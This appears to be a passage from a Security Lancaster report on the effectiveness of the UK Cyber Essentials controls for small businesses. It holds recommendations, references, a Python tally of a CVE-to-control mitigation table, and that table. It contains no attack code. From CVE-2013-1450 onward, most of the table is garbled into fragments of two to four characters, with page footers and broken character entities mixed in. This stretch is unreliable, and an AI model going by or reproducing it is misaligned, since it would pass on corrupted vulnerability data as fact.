The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action in more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor’s security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard’s operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most widely used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, isn’t necessarily understood by individuals as a tool that greatly improves cyber security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and, as such, is vital to an organisation’s cyber-safety.
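The proportions in this section come from the Cyber Controls Applicability table in the appendix. To make that kind of count reproducible on the page's own data, the following Python (an added example, not the report's tooling) transcribes the 28 rows of that table that appear on this page (CVE-2013-0008 to CVE-2013-1388) and works out, per control, how often it is credited in the "With CE" column, which rows stay unmitigated, and how many rows apply to each SME. The grouping of table labels onto control names (for instance treating "User Access" and "Access Policy" as the same access-control measure) is an assumption of this example, and because only a 28-row subset is transcribed the figures are not the report's 87.5% and 10%.

```python
"""Per-control mitigation counts over the Cyber Controls Applicability table.

Added example, not the report's own tooling.  ROWS transcribes the 28 rows of
the appendix table that appear on this page: applicability flags for SME 1-4
and the idealised network, the 'With CE' verdict and the controls credited.
The 'No CE' column reads 'Not Mitigated' for every one of these rows, so it
is not repeated here.
"""
from collections import Counter
from typing import Dict, List, Tuple

Row = Tuple[str, str, str, List[str]]  # (CVE, flags SME1..SME4+Idealised, verdict, controls)

ROWS: List[Row] = [
    ("CVE-2013-0008", "yyyyy", "Mitigated", ["Firewall", "Secure Configuration (User Policy)", "Anti-Malware"]),
    ("CVE-2013-0022", "ynyyn", "Mitigated", ["Patch Management", "Secure Configuration (Secure Browser)", "Website Blacklisting"]),
    ("CVE-2013-0084", "yyyny", "Partially Mitigated", ["Patch Management", "Secure Configuration (Secure Browser)", "Website Blacklisting"]),
    ("CVE-2013-0140", "ynnnn", "Partially Mitigated", ["Patch Management"]),
    ("CVE-2013-0149", "nnnnn", "Mitigated", ["Firewall", "Secure Configuration", "Patch Management"]),
    ("CVE-2013-0172", "ynnnn", "Mitigated", ["User Access (Strong Password)", "Patch Management"]),
    ("CVE-2013-0174", "nnnnn", "Mitigated", ["Access Policy (Strong Password)", "Firewall", "Patch Management"]),
    ("CVE-2013-0199", "ynnnn", "Mitigated", ["Patch Management", "Secure Configuration"]),
    ("CVE-2013-0253", "nnynn", "Mitigated", ["Patch Management", "Secure Configuration (Secure Server)"]),
    ("CVE-2013-0270", "nnnnn", "Partially Mitigated", ["Patch Management"]),
    ("CVE-2013-0481", "nnnnn", "Partially Mitigated", ["Patch Management"]),
    ("CVE-2013-0598", "nnnnn", "Partially Mitigated", ["Patch Management"]),
    ("CVE-2013-0619", "yyyyy", "Partially Mitigated", ["Patch Management"]),
    ("CVE-2013-0633", "yyyyy", "Mitigated", ["Firewall", "Secure Configuration (Secure Browsing)", "Firmware Management"]),
    ("CVE-2013-0649", "yyyyy", "Mitigated", ["Firewall", "Secure Configuration (Secure Browsing)", "Patch Management"]),
    ("CVE-2013-0746", "yyyyy", "Partially Mitigated", ["Patch Management"]),
    ("CVE-2013-0753", "yyyyy",
     "Mitigated", ["Patch Management", "Secure Configuration (Secure Browser)", "Website Blacklisting"]),
    ("CVE-2013-0787", "yyyyn", "Mitigated", ["Patch Management"]),
    ("CVE-2013-0909", "yyyyy", "Partially Mitigated", ["Patch Management"]),
    ("CVE-2013-1035", "yyyyn", "Mitigated", ["Patch Management", "Secure Configuration (Secure Browser)", "Website Blacklisting"]),
    ("CVE-2013-1102", "nnnnn", "Mitigated", ["Firewall", "Secure Configuration", "Patch Management"]),
    ("CVE-2013-1140", "nnnnn", "Not Mitigated", ["Secure Configuration (Don't install)"]),
    ("CVE-2013-1144", "nnnnn", "Partially Mitigated", ["Patch Management", "Firewall"]),
    ("CVE-2013-1153", "ynnnn", "Partially Mitigated", ["Patch Management", "Secure Configuration"]),
    ("CVE-2013-1181", "nnnnn", "Mitigated", ["Firewall", "Secure Configuration", "Patch Management"]),
    ("CVE-2013-1303", "ynyyn", "Mitigated", ["Patch Management", "Secure Configuration (Secure Browser)", "Website Blacklisting"]),
    ("CVE-2013-1384", "yyyyn", "Partially Mitigated", ["Patch Management", "Secure Configuration (Secure Browser)"]),
    ("CVE-2013-1388", "nnnnn", "Partially Mitigated", ["Patch Management", "Secure Configuration"]),
]

NETWORKS = ["SME 1", "SME 2", "SME 3", "SME 4", "Idealised"]


def normalise(control: str) -> str:
    """Map a table label onto a control name.  Assumption made for this example:
    the parenthetical qualifier is dropped, and 'User Access' and 'Access Policy'
    are both counted as the access-control measure."""
    base = control.split(" (")[0]
    return "Access Control" if base in ("User Access", "Access Policy") else base


def verdict_counts(rows: List[Row] = ROWS) -> Dict[str, int]:
    """Tally of the 'With CE' verdicts."""
    return dict(Counter(verdict for _, _, verdict, _ in rows))


def control_counts(rows: List[Row] = ROWS) -> Dict[str, int]:
    """Number of rows in which each control is credited (a row counts once per control)."""
    tally: Counter = Counter()
    for _, _, _, controls in rows:
        for name in {normalise(c) for c in controls}:
            tally[name] += 1
    return dict(tally)


def control_share(rows: List[Row] = ROWS) -> Dict[str, float]:
    """Share of the at-least-partially-mitigated rows in which each control plays a part."""
    helped = [r for r in rows if r[2] != "Not Mitigated"]
    return {name: round(n / len(helped), 3) for name, n in control_counts(helped).items()}


def applicable_counts(rows: List[Row] = ROWS) -> Dict[str, int]:
    """How many of the listed CVEs apply to each network (flag 'y')."""
    return {net: sum(1 for r in rows if r[1][i] == "y") for i, net in enumerate(NETWORKS)}


def unresolved(rows: List[Row] = ROWS) -> List[str]:
    """CVEs the table leaves unmitigated even with Cyber Essentials in place."""
    return [cve for cve, _, verdict, _ in rows if verdict == "Not Mitigated"]


if __name__ == "__main__":
    print(verdict_counts())
    print(control_share())
    print(applicable_counts())
    print(unresolved())
```

On this subset the verdicts split 15 mitigated, 12 partially mitigated and 1 not mitigated (CVE-2013-1140, the "don't install" case the Conclusions refer to), and patch management is credited in 25 of the 27 rows that are helped at all, which is the same shape as the report's finding that patch management carries most of the mitigation while being the control SMEs use least.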

Recommendations

To further improve cyber security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension to, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle these other types of attacks mentioned above, which were not within the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] Innovation, CESG, UK Trade & Investment, Prime Minister’s Office 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, UK Trade & Department for Business and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka ShellShock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyber Controls Applicability

| CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware |
| CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management |
| CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management |
| CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration |
| CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management |
| CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management |
| CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management |
| CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don’t install) |
| CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall |
| CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser) |
| CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |

CV

E-2

01

3-1

45

0y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-1

47

2y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Acc

ess

Po

licy)

CV

E-2

01

3-1

55

3y

ny

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

62

0y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-1

62

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

63

8y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

66

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

67

6y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

70

0y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tA

nti

-Mal

war

eC

VE

-20

13

-17

34

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-17

77

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-23

19

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

C

VE

-20

13

-23

40

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-2

35

0n

yn

ny

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-2

49

2y

ny

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-25

07

yn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Fir

mw

are

Man

agem

ent

An

ti-M

alw

are

CV

E-2

01

3-2

73

6y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-2

78

0n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-28

03

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

Pat

chM

anag

emen

tsC

VE

-20

13

-28

24

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-2

82

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-29

20

ny

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-30

64

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

16

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

37

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eS

ecu

reC

on

fig

ura

tio

n(D

on

rsquotIn

stal

l)C

VE

-20

13

-31

94

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

99

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

01

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

06

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

80

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tamp

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-3

38

7n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-34

17

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-3

63

2y

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Acc

ess

Po

licy

(Str

on

gP

assw

ord

)F

irew

all

CV

E-2

01

3-3

65

6n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-3

85

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tF

irew

all

An

ti-M

alw

are

CV

E-2

01

3-3

86

0y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-3

89

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n-

no

JS

CV

E-2

01

3-3

89

7y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-39

00

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-3

90

5y

yn

yn

No

tM

itig

ated

No

tM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(D

on

rsquotin

stal

l)C

VE

-20

13

-42

23

yn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CV

E-2

01

3-4

43

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-4

47

8n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-45

29

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-45

55

yn

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-47

76

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-4

78

2n

nn

nn

No

tM

itig

ated

No

tM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(D

on

rsquotin

stal

l)C

VE

-20

13

-50

57

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-5

36

9n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampS

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-54

28

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-54

31

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-54

94

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-5

50

7n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

3-5

53

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

3-5

55

9n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-5

56

1n

nn

nn

No

tM

itig

ated

No

tM

itig

ated

-S

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-57

51

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tamp

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-5

75

7n

nn

nm

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lC

VE

-20

13

-58

28

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

t

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-6

16

7y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tA

cces

sC

on

tro

lS

ecu

reC

on

fig

ura

tio

n(C

oo

kie-

del

etio

n)

CV

E-2

01

3-6

18

8y

yn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-62

84

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CV

E-2

01

3-6

39

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reS

erve

r)C

VE

-20

13

-64

75

ny

yn

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eF

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-66

60

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-66

99

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-6

70

2n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

3-6

97

9n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-6

99

4n

ny

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-7

00

4y

nn

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Fir

mw

are

Man

agem

ent

CV

E-2

01

3-7

04

3n

nn

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-F

irm

war

eM

anag

emen

tC

VE

-20

13

-73

89

yn

ny

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

F

irm

war

eM

anag

emen

tC

VE

-20

14

-00

01

yn

yn

nN

ot

Mit

igat

edM

itig

ated

-B

ou

nd

ary

Fir

ewal

lsin

clu

de

anti

-DO

SC

VE

-20

14

-00

35

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

ampS

SL

CV

E-2

01

4-0

16

0y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-0

20

7n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tamp

SS

LC

VE

-20

14

-02

32

yy

yn

nN

ot

Mit

igat

edM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

14

-02

59

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-M

alw

are

Pro

tect

ion

ampP

atch

Man

agem

ent

CV

E-2

01

4-0

26

6y

yy

ny

No

tM

itig

ated

Par

tial

lyM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

4-0

29

4n

ny

ny

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

A

nti

-Mal

war

eC

VE

-20

14

-03

13

yn

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

14

-03

54

yn

ny

nN

ot

Mit

igat

edM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n

Fir

mw

are

Man

agem

ent

CV

E-2

01

4-0

36

2y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tamp

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

ramp

Web

Ho

stin

g)

CV

E-2

01

4-0

43

3y

yy

ny

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-04

88

yn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tA

nti

-Mal

war

eC

VE

-20

14

-04

93

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-04

94

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-04

98

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-05

15

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-05

33

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Acc

